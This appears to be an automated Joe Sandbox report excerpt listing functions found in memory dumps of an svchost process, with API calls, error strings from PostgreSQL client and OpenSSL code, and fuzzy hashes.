                                                                                            • Instruction ID: f8bde37929f1ff6ba9fb97a06fe6f09275929b86e0b22d91b63bb497b7a530a3
                                                                                            • Opcode Fuzzy Hash: 28837276f4f25ef3f45700059dea778a19c2f9cf2792603be5c1e69070d17263
                                                                                            • Instruction Fuzzy Hash: 8391E4FAA1D780C5EB028B95E45439EFFE1E746B98F948636CA580F381DB79C089C741
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmp
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: _errnofree$ContextInitializeSecuritylibintl_dgettextmalloc
                                                                                            • String ID: SSPI continuation error$SSPI returned invalid number of output buffers$out of memory$out of memory allocating SSPI buffer (%d)
                                                                                            • API String ID: 3210687015-2504083155
                                                                                            • Opcode ID: b6618783d20aa82b2f35466f3bf56a140c8222acba6ed107f6d7c3dd8583f758
                                                                                            • Instruction ID: a73ec21f7510e14cda621cf0745582a32a81e221ba2114999c28a8ba6b296601
                                                                                            • Opcode Fuzzy Hash: b6618783d20aa82b2f35466f3bf56a140c8222acba6ed107f6d7c3dd8583f758
                                                                                            • Instruction Fuzzy Hash: 8A61E53270AB8181FA608F15F4603AA7396FB84BD4F285135EA8D677A6CF3ED445CB44
                                                                                            APIs
                                                                                            Strings
                                                                                            • D:\a\postgresql-packaging-foundation\postgresql-packaging-foundation\postgresql-16.3\src\port\open.c, xrefs: 00007FFDA36F456D
                                                                                            • (fileFlags & ((O_RDONLY | O_WRONLY | O_RDWR) | O_APPEND | (O_RANDOM | O_SEQUENTIAL | O_TEMPORARY) | _O_SHORT_LIVED | O_DSYNC | O_D, xrefs: 00007FFDA36F4574
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmp
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: Last$CloseCreateErrorFileHandleStatus_close_open_osfhandle_setmode_wassert
                                                                                            • String ID: (fileFlags & ((O_RDONLY | O_WRONLY | O_RDWR) | O_APPEND | (O_RANDOM | O_SEQUENTIAL | O_TEMPORARY) | _O_SHORT_LIVED | O_DSYNC | O_D$D:\a\postgresql-packaging-foundation\postgresql-packaging-foundation\postgresql-16.3\src\port\open.c
                                                                                            • API String ID: 3317356059-1407915
                                                                                            • Opcode ID: 3a05bbb26f22d63b270656d5914e9516d24cc1b69938084c8723307dfbb3aa89
                                                                                            • Instruction ID: 226d0217daea0491a1fdeb3ff0634132beb4d6b9440cb77c5e9eaf585d742fb0
                                                                                            • Opcode Fuzzy Hash: 3a05bbb26f22d63b270656d5914e9516d24cc1b69938084c8723307dfbb3aa89
                                                                                            • Instruction Fuzzy Hash: 0B414C22B0BA0343FB228B14AC6237D1582BB84764F1C5234DE5EA77C2DF3EE8558748
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmp
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorFormatLastLibraryLoadMessagelibintl_gettextmemsetstrerror
                                                                                            • String ID: netmsg.dll$operating system error %d$unrecognized winsock error %d$winsock error %d (could not load netmsg.dll to translate: error code %lu)
                                                                                            • API String ID: 252814119-2704675961
                                                                                            • Opcode ID: 68d3117696a1300142bdc936807f85c187c0fb69c36a8b612ef794b28a2c2579
                                                                                            • Instruction ID: 9603875c128bdc32d08f5a64a90567fc91be498d92fcabba29608f83429b027d
                                                                                            • Opcode Fuzzy Hash: 68d3117696a1300142bdc936807f85c187c0fb69c36a8b612ef794b28a2c2579
                                                                                            • Instruction Fuzzy Hash: 7431C661F0B74285FA149F16B4202B963A2AF48BD4F4C5135EE5D6779BDF3EE4018708
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3448016000.0000000066001000.00000020.00000001.01000000.00000013.sdmp, Offset: 66000000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3447969945.0000000066000000.00000002.00000001.01000000.00000013.sdmp
                                                                                            • Associated: 0000002A.00000002.3448075798.000000006601E000.00000002.00000001.01000000.00000013.sdmp
                                                                                            • Associated: 0000002A.00000002.3448241150.00000000660EF000.00000004.00000001.01000000.00000013.sdmp
                                                                                            • Associated: 0000002A.00000002.3448283516.00000000660F0000.00000002.00000001.01000000.00000013.sdmp
                                                                                            • Associated: 0000002A.00000002.3448334850.00000000660F1000.00000004.00000001.01000000.00000013.sdmp
                                                                                            • Associated: 0000002A.00000002.3448369571.00000000660F4000.00000008.00000001.01000000.00000013.sdmp
                                                                                            • Associated: 0000002A.00000002.3448405346.00000000660F5000.00000002.00000001.01000000.00000013.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_66000000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: strcmpstrcpy
                                                                                            • String ID: 1$ASCII$CP%s$CP%u$CP1361$UTF-8$utf8
                                                                                            • API String ID: 1519103487-2156787605
                                                                                            • Opcode ID: e1db7c93cf5b70d4ba0ba0f65a78f5f88b2f0d7a2ad37ef213c1b56ae7847875
                                                                                            • Instruction ID: be7bc58e9f166aea21b4b45d5e1e2d565f648104c6a08d33aa0755e541aaf538
                                                                                            • Opcode Fuzzy Hash: e1db7c93cf5b70d4ba0ba0f65a78f5f88b2f0d7a2ad37ef213c1b56ae7847875
                                                                                            • Instruction Fuzzy Hash: BF31F432B5D65096EA11CB96EC10387EB65E7897ACFC44636CD2C43794EB7EC58AC301
                                                                                            APIs
                                                                                            • LoadLibraryExA.KERNEL32(?,?,?,?,?,?,00000000,00007FFDA36E8D19,?,?,?,00007FFDA36E9D72), ref: 00007FFDA36F3CBC
                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,00000000,00007FFDA36E8D19,?,?,?,00007FFDA36E9D72), ref: 00007FFDA36F3CD1
                                                                                            • memset.VCRUNTIME140(?,?,?,?,?,?,00000000,00007FFDA36E8D19,?,?,?,00007FFDA36E9D72), ref: 00007FFDA36F3D1E
                                                                                            • FormatMessageA.KERNEL32 ref: 00007FFDA36F3D4A
                                                                                            • strerror.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,00000000,00007FFDA36E8D19,?,?,?,00007FFDA36E9D72), ref: 00007FFDA36F3D7E
                                                                                            • libintl_gettext.LIBINTL-9(?,?,?,?,?,?,00000000,00007FFDA36E8D19,?,?,?,00007FFDA36E9D72), ref: 00007FFDA36F3DC7
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmp
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorFormatLastLibraryLoadMessagelibintl_gettextmemsetstrerror
                                                                                            • String ID: netmsg.dll$operating system error %d$unrecognized winsock error %d$winsock error %d (could not load netmsg.dll to translate: error code %lu)
                                                                                            • API String ID: 252814119-2704675961
                                                                                            • Opcode ID: 67bdfc0701c5697eebee649abdaaa68898a284d9d033e0692bced8f1b55de6a1
                                                                                            • Instruction ID: ad628c3f0de1dc1e2f130fd9081c09f33c2d603c2174528be94d1e022b414373
                                                                                            • Opcode Fuzzy Hash: 67bdfc0701c5697eebee649abdaaa68898a284d9d033e0692bced8f1b55de6a1
                                                                                            • Instruction Fuzzy Hash: CD31CE61B0B64241FA149B0AB8203B56362BF88BD4F9C1135DD5D67BEBEF3EE4418708
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmp
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: Time$FilePreciseSystem_localtime64fputcstrftime
                                                                                            • String ID: %d$%Y-%m-%d %H:%M:%S$%s$.%06u$CancelRequest$F%d$Unknown message: length is %d
                                                                                            • API String ID: 3990603502-3493573826
                                                                                            • Opcode ID: 2633b100bf8dd3bffce0ca744b574df00262f3b0acea8f130d620fa9fe79fd62
                                                                                            • Instruction ID: d84782529e5579cb92c8344608269b3abd0481d7fc8a4dc12c68da2a813110b6
                                                                                            • Opcode Fuzzy Hash: 2633b100bf8dd3bffce0ca744b574df00262f3b0acea8f130d620fa9fe79fd62
                                                                                            • Instruction Fuzzy Hash: 2B41B63171BA8681FB20CB15E4642A97322FF84BD8F586232DA4E1379ADF7EE505C744
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451563505.00007FFDA3601000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFDA3600000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451531136.00007FFDA3600000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451655757.00007FFDA3690000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451689034.00007FFDA36BD000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451714646.00007FFDA36C1000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda3600000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: L_sk_pop$L_sk_new_nullL_sk_pushR_newR_set_debugR_set_errorT_free
                                                                                            • String ID: ct_move_scts$ssl\ssl_lib.c
                                                                                            • API String ID: 2898183876-1945711875
                                                                                            • Opcode ID: cbaa212015b02ca3eac7ae01570107f86f471106c1ba61f8259b0908e4114b4a
                                                                                            • Instruction ID: 617acf480cd66ea7f926e8ea0b80b18e0f5cca1725ed4d2657a4da755695940a
                                                                                            • Opcode Fuzzy Hash: cbaa212015b02ca3eac7ae01570107f86f471106c1ba61f8259b0908e4114b4a
                                                                                            • Instruction Fuzzy Hash: B8219621B0F74242FA10EB65942017D6656EF99B80F0C6071EE4E63BD7DE3EE4419318
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: __acrt_iob_funcfreemallocmemset
                                                                                            • String ID: %%s %%-%ds$%%s %%s$%s$out of memory$|%s
                                                                                            • API String ID: 2794046227-1857694925
                                                                                            • Opcode ID: c390ec889e4d9d56021e8fbf0c33fc023ee6495dfa6382d26169113ed30df47b
                                                                                            • Instruction ID: 776836f7229e4ea5a6e1d9459cd8a5cbadaf6acef2b93b79faf4af3fc42ea160
                                                                                            • Opcode Fuzzy Hash: c390ec889e4d9d56021e8fbf0c33fc023ee6495dfa6382d26169113ed30df47b
                                                                                            • Instruction Fuzzy Hash: EA518012B0B64289F915DB26A9313B96353AF44BC0F9C3131DD0E67757EE7EE4098308
                                                                                            APIs
                                                                                            • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FFDA36D1410), ref: 00007FFDA36D1C7F
                                                                                            • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FFDA36D1410), ref: 00007FFDA36D1D02
                                                                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFDA36D1410), ref: 00007FFDA36D1D4B
                                                                                            • strtol.API-MS-WIN-CRT-CONVERT-L1-1-0(?,?,?,00007FFDA36D1410), ref: 00007FFDA36D1DB3
                                                                                              • Part of subcall function 00007FFDA36E2D70: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,-00000001,00007FFDA36D15B3), ref: 00007FFDA36E2D89
                                                                                              • Part of subcall function 00007FFDA36E2D70: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFDA36E2DB1
                                                                                              • Part of subcall function 00007FFDA36E2D70: libintl_dgettext.LIBINTL-9 ref: 00007FFDA36E2DD2
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: _errno_strdup$libintl_dgettextmallocstrtol
                                                                                            • String ID: invalid SCRAM response (nonce mismatch)$malformed SCRAM message (garbage at end of server-first-message)$malformed SCRAM message (invalid iteration count)$malformed SCRAM message (invalid salt)$out of memory
                                                                                            • API String ID: 690629157-1082015424
                                                                                            • Opcode ID: fcc66b80b5218fa4746dfd9456b9021e4de867423d8047dbd469ddc31809edd9
                                                                                            • Instruction ID: 1b188a38e411f68b4da4e881609c711402e335d4198d8098a12d8e663bf34020
                                                                                            • Opcode Fuzzy Hash: fcc66b80b5218fa4746dfd9456b9021e4de867423d8047dbd469ddc31809edd9
                                                                                            • Instruction Fuzzy Hash: 5441B462B0BB4648FA558F55A4202B92792AF457D4F4C3030DA0D273D7EFBDE485C344
                                                                                            APIs
                                                                                            • memcmp.VCRUNTIME140 ref: 00007FFDA36E7B28
                                                                                            • inet_pton.WS2_32 ref: 00007FFDA36E7B4F
                                                                                            • memcmp.VCRUNTIME140 ref: 00007FFDA36E7B65
                                                                                            • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFDA36E7B99
                                                                                            • _strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFDA36E7BF5
                                                                                              • Part of subcall function 00007FFDA36F5490: isdigit.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,00000000,?,00000002,00007FFDA36E7B19), ref: 00007FFDA36F5516
                                                                                              • Part of subcall function 00007FFDA36F5490: isxdigit.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFDA36F5539
                                                                                              • Part of subcall function 00007FFDA36F5490: islower.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFDA36F5545
                                                                                              • Part of subcall function 00007FFDA36F5490: isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,00000000,?,00000002,00007FFDA36E7B19), ref: 00007FFDA36F55A7
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: memcmp$_errno_strdupinet_ptonisdigitislowerisspaceisxdigit
                                                                                            • String ID: .$certificate contains IP address with invalid length %zu$could not convert certificate's IP address to string: %s$host name must be specified
                                                                                            • API String ID: 4044949803-2902407262
                                                                                            • Opcode ID: f19e7713b305a99309a9cecdce80f1332364a7b232cf699e17a4868061b1fd24
                                                                                            • Instruction ID: 762142bb1d98c9d74f63dd2b7e8bf91f78ecb8fa98faae29b252ffb1525561b4
                                                                                            • Opcode Fuzzy Hash: f19e7713b305a99309a9cecdce80f1332364a7b232cf699e17a4868061b1fd24
                                                                                            • Instruction Fuzzy Hash: 2F41B171B0BB4241FA61DF15E4203F92362AB85BD0F586131DE4D27796EF3EE5498708
                                                                                            APIs
                                                                                              • Part of subcall function 00007FFDA36EBCA0: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,-00000001,00007FFDA36D14CE), ref: 00007FFDA36EBCAE
                                                                                              • Part of subcall function 00007FFDA36D8370: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFDA36DA885,?,?,?,00007FFDA36D6A42,?,?,?,00007FFDA36D3380), ref: 00007FFDA36D8382
                                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFDA36D5386
                                                                                            • _strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFDA36D53F9
                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFDA36D541E
                                                                                              • Part of subcall function 00007FFDA36E2CD0: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,00007FFDA36D1C16,?,?,?,?,00007FFDA36D1CA5), ref: 00007FFDA36E2CE8
                                                                                              • Part of subcall function 00007FFDA36E2CD0: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFDA36E2D10
                                                                                              • Part of subcall function 00007FFDA36E2CD0: libintl_dgettext.LIBINTL-9 ref: 00007FFDA36E2D31
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: _errnomalloc$_strdupfreelibintl_dgettextstrcmp
                                                                                            • String ID: 1$out of memory$prefer$require$requiressl$sslmode
                                                                                            • API String ID: 159604881-3175095941
                                                                                            • Opcode ID: 2ea1d13a237264883a3404e7c84326039b87f7d5543c7237b979e9166fdb883a
                                                                                            • Instruction ID: 3f1e5f3534bc33fe3e82de8dd23363ab82f645a7b3b5a9ff9b5ee346e53974b2
                                                                                            • Opcode Fuzzy Hash: 2ea1d13a237264883a3404e7c84326039b87f7d5543c7237b979e9166fdb883a
                                                                                            • Instruction Fuzzy Hash: 14419422B0BB4286FA508B16E46037967A2FF45B81F5C2135DB8D63B96EF3EE444C714
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: fputcisprint
                                                                                            • String ID: "%s"$ %c$ %d$ \x%02x$DataRow$Describe$mismatched message length: consumed %d, expected %d
                                                                                            • API String ID: 3787447051-3769170408
                                                                                            • Opcode ID: 57490bd248cd5b0d53f2c7c806297d899b22f64b5ca0fc5719161b090a49d377
                                                                                            • Instruction ID: 59fe4f20ccf96c8ad945c2b1e93bd01510a2e4aebf5b722086a920110268f15e
                                                                                            • Opcode Fuzzy Hash: 57490bd248cd5b0d53f2c7c806297d899b22f64b5ca0fc5719161b090a49d377
                                                                                            • Instruction Fuzzy Hash: 3F31E562B1B28682F610DB15E4606F96763AF407C8F487132DE0E23797CE7EE549C308
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: _strdupfreestrcmp
                                                                                            • String ID: invalid connection option "%s"$out of memory$prefer$require$requiressl$sslmode
                                                                                            • API String ID: 1900607443-2907004332
                                                                                            • Opcode ID: c3cf6a7e1567d56bf751ed82f569bcbe135e5690a94be67f6a9eca0878b2f7ee
                                                                                            • Instruction ID: c0e98d6896fe0c30c6e6bcbca18bbe0e311dc4b80ab71414c638ecc2c5b6d275
                                                                                            • Opcode Fuzzy Hash: c3cf6a7e1567d56bf751ed82f569bcbe135e5690a94be67f6a9eca0878b2f7ee
                                                                                            • Instruction Fuzzy Hash: 4931A212B0FBC285FE549B16E4242796792AF84BC0F0C6035DE4D2779BEE2EE444C308
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451563505.00007FFDA3601000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFDA3600000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451531136.00007FFDA3600000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451655757.00007FFDA3690000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451689034.00007FFDA36BD000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451714646.00007FFDA36C1000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda3600000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: R_newR_set_debug$L_sk_numR_set_error
                                                                                            • String ID: SSL_CTX_set_ssl_version$ssl\ssl_lib.c
                                                                                            • API String ID: 3961781951-1646672100
                                                                                            • Opcode ID: edba7c28ef3a6bf41a983555b6c9a5eb45180de582e41dd75b9e93b44441d8e1
                                                                                            • Instruction ID: 110a5eda00c8a3c55584748a3a3a43d8f0c04251df251cd4e3f84bc0fe651d6d
                                                                                            • Opcode Fuzzy Hash: edba7c28ef3a6bf41a983555b6c9a5eb45180de582e41dd75b9e93b44441d8e1
                                                                                            • Instruction Fuzzy Hash: 73217F21B0F64282FB50EB61E4712B99252EF49784F5CA431EA4C677DBDE3EE4818319
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3448016000.0000000066001000.00000020.00000001.01000000.00000013.sdmp, Offset: 66000000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3447969945.0000000066000000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448075798.000000006601E000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448241150.00000000660EF000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448283516.00000000660F0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448334850.00000000660F1000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448369571.00000000660F4000.00000008.00000001.01000000.00000013.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3448405346.00000000660F5000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_66000000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 89a4708f0f3316604be79fcb46ad18ce4641ab9c3ddcdd4e737397f0ff8ddc70
                                                                                            • Instruction ID: ffc3e861d4ef98dd4704aa29fb57a2bb400d0911773b95a1a4627edc2b901c72
                                                                                            • Opcode Fuzzy Hash: 89a4708f0f3316604be79fcb46ad18ce4641ab9c3ddcdd4e737397f0ff8ddc70
                                                                                            • Instruction Fuzzy Hash: 29811961D2C160A6F7118FED580079CEE91B3977CFFD16932EC928B269D6A4CDC2C291
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmp
